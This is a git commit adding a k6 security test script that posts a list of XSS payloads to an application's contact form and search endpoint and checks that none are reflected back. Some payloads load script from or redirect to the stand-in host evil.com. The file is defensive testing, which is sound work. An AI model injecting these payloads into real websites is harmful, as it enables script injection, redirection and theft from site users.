feat: 添加性能和安全测试，完善部署文档

阶段五：性能和安全测试
- 创建负载测试脚本：模拟正常用户访问模式
- 创建压力测试脚本：测试系统极限性能
- 创建SQL注入测试脚本：验证SQL注入防护
- 创建XSS防护测试脚本：验证XSS防护
- 添加测试脚本到package.json

阶段六：文档和培训
- 更新README.md：添加监控和告警文档
- 添加性能测试文档和命令
- 添加安全测试文档和命令
- 添加Docker部署文档
- 添加生产环境配置文档
- 添加备份和恢复文档

tests/security/xss-test.js

@@ -0,0 +1,98 @@
+import http from 'k6/http';
+import { check } from 'k6';
+
+export const options = {
+  thresholds: {
+    checks: ['rate==1.0'],  // 所有安全检查必须通过
+  },
+};
+
+const BASE_URL = __ENV.BASE_URL || 'http://localhost:3000';
+
+const xssPayloads = [
+  '<script>alert("XSS")</script>',
+  '<img src=x onerror=alert("XSS")>',
+  '<svg onload=alert("XSS")>',
+  '<body onload=alert("XSS")>',
+  '<input onfocus=alert("XSS") autofocus>',
+  '<select onfocus=alert("XSS") autofocus>',
+  '<textarea onfocus=alert("XSS") autofocus>',
+  '<keygen onfocus=alert("XSS") autofocus>',
+  '<video><source onerror=alert("XSS")>',
+  '<audio src=x onerror=alert("XSS")>',
+  '<iframe src="javascript:alert("XSS")">',
+  '<details open ontoggle=alert("XSS")>',
+  '<marquee onstart=alert("XSS")>',
+  '<isindex action="javascript:alert("XSS")">',
+  '<form><button formaction="javascript:alert("XSS")">X</button></form>',
+  'javascript:alert("XSS")',
+  '<script>document.location="http://evil.com"</script>',
+  '<img src=x onerror="document.location=\'http://evil.com\'">',
+  '<svg><script>document.location="http://evil.com"</script></svg>',
+  '<script src="http://evil.com/xss.js"></script>',
+  '<link rel="stylesheet" href="javascript:alert("XSS")">',
+];
+
+export default function () {
+  let allPassed = true;
+
+  xssPayloads.forEach((payload) => {
+    const testCases = [
+      {
+        name: 'Contact Form - XSS',
+        url: `${BASE_URL}/api/contact`,
+        method: 'POST',
+        body: JSON.stringify({
+          name: payload,
+          email: 'test@example.com',
+          phone: '13800138000',
+          message: payload,
+        }),
+      },
+      {
+        name: 'Search - XSS',
+        url: `${BASE_URL}/api/search?q=${encodeURIComponent(payload)}`,
+        method: 'GET',
+      },
+    ];
+
+    testCases.forEach((testCase) => {
+      let res;
+      if (testCase.method === 'POST') {
+        res = http.post(testCase.url, testCase.body, {
+          headers: { 'Content-Type': 'application/json' },
+          tags: { name: testCase.name },
+        });
+      } else {
+        res = http.get(testCase.url, {
+          tags: { name: testCase.name },
+        });
+      }
+
+      const passed = check(res, {
+        'status is 200 or 400 or 422': (r) => [200, 400, 422].includes(r.status),
+        'XSS payload not reflected in response': (r) => {
+          const lowerBody = r.body.toLowerCase();
+          return !lowerBody.includes('<script>') &&
+                 !lowerBody.includes('onerror=') &&
+                 !lowerBody.includes('onload=') &&
+                 !lowerBody.includes('onfocus=') &&
+                 !lowerBody.includes('javascript:') &&
+                 !lowerBody.includes('document.location');
+        },
+        'no alert in response': (r) => !r.body.includes('alert('),
+        'no iframe in response': (r) => !r.body.includes('<iframe'),
+        'no external script in response': (r) => !r.body.includes('http://evil.com'),
+      });
+
+      if (!passed) {
+        allPassed = false;
+        console.error(`XSS test failed for payload: ${payload}`);
+      }
+    });
+  });
+
+  if (!allPassed) {
+    throw new Error('XSS tests failed');
+  }
+}